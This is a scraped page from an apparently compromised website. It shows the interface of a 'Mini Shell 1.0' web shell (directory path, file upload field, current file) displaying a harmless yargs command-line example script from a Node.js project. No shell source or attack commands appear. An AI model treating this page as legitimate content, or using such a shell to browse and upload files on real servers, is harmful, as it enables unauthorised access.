HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/node-app/node_modules/yargs/example/
Upload File :
Current File : //var/www/node-app/node_modules/yargs/example/requires_arg.js
var yargs = require('yargs');

var argv = yargs.usage('This is my awesome program', {
  'input': {
    description: 'Input file name',
    requiresArg: true,
    short: 'i',
  },
  'output': {
    description: 'Output file name',
    requiresArg: true,
    short: 'o'
  }
}).argv;

yargs.showHelp();

console.log('\n\nInspecting options');
console.dir(argv);